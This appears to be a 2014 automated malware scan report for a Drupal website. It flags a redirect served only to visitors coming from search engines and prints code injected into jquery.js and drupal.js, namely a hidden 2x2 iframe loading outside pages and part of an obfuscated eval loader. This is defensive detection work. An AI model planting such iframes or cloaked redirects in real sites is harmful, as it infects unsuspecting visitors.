Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://ubitraining.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: ubitraining.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Cache-Control: max-age=1209600 Connection: close Date: Sat, 27 Sep 2014 10:31:31 GMT Location: http://gsg-wetter.de/zhhf.html?h=1624223 Server: nginx/1.6.2 Content-Length: 289 Content-Type: text/html; charset=iso-8859-1 Expires: Sat, 11 Oct 2014 10:31:31 GMT | malicious |
Scanned pages/files
Request | Server response | Status |
http://ubitraining.com/ | 200 OK Content-Length: 14863 Content-Type: text/html | clean |
http://ubitraining.com/misc/jquery.js?I | 200 OK Content-Length: 31185 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gsg-wetter.de/zhhf.html?j=1624223></iframe>');
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);r Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://gsg-wetter.de/zhhf.html?j=1624223 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gsg-wetter.de/zhhf.html?j=1624223> | ||
http://ubitraining.com/misc/drupal.js?I | 200 OK Content-Length: 10702 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://scouts46elauzon.qc.ca/zzef.html?j=1624223></iframe>');
(function () { var jquery_init = jQuery.fn.init; jQuery.fn.init = function (selector, context, rootjQuery) { if (selector && typeof selector === 'string') { var hash_position = selector.indexOf('#'); if (hash_position >= 0) { var bracket_position } return message; } if (Drupal.jsEnabled) { $(document.documentElement).addClass('js'); document.cookie = 'has_js=1; path=/'; $(document).ready(function() { Drupal.attachBehaviors(this); }); } Drupal.theme.prototype = { placeholder: function(str) { return '<em>' + Drupal.checkPlain(str) + '</em>'; } }; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://scouts46elauzon.qc.ca/zzef.html?j=1624223 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://scouts46elauzon.qc.ca/zzef.html?j=1624223> | ||
http://ubitraining.com/sites/all/themes/fusion/fusion_core/js/jquery.bgiframe.min.js?I | 200 OK Content-Length: 1519 Content-Type: application/javascript | clean |
http://ubitraining.com/sites/all/themes/fusion/fusion_core/js/hoverIntent.js?I | 200 OK Content-Length: 3176 Content-Type: application/javascript | clean |
http://ubitraining.com/sites/all/themes/fusion/fusion_core/js/supposition.js?I | 200 OK Content-Length: 2697 Content-Type: application/javascript | clean |
http://ubitraining.com/sites/all/themes/fusion/fusion_core/js/supersubs.js?I | 200 OK Content-Length: 3298 Content-Type: application/javascript | clean |
http://ubitraining.com/sites/all/themes/fusion/fusion_core/js/superfish.js?I | 200 OK Content-Length: 3710 Content-Type: application/javascript | clean |
http://ubitraining.com/sites/all/themes/fusion/fusion_core/js/script.js?I | 200 OK Content-Length: 6163 Content-Type: application/javascript | clean |
http://ubitraining.com/sites/all/themes/converge/js/jquery.validate.js?I | 200 OK Content-Length: 25307 Content-Type: application/javascript | clean |
http://ubitraining.com/sites/all/themes/converge/js/jquery.overlabel.js?I | 200 OK Content-Length: 1401 Content-Type: application/javascript | clean |
http://ubitraining.com/sites/all/themes/converge/piecemaker/js/swfobject.js?I | 200 OK Content-Length: 10220 Content-Type: application/javascript | clean |
http://ubitraining.com/sites/all/themes/converge/js/equalheights.js?I | 200 OK Content-Length: 1027 Content-Type: application/javascript | clean |
http://ubitraining.com/sites/all/themes/converge/js/converge.js?I | 200 OK Content-Length: 18601 Content-Type: application/javascript | clean |
http://ubitraining.com/sites/all/themes/converge/js/jquery.easing.1.1.1.js?I | 200 OK Content-Length: 8097 Content-Type: application/javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ubitraining.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ubitraining.com/
Result: ubitraining.com is not infected or malware details are not published yet.
Result: ubitraining.com is not infected or malware details are not published yet.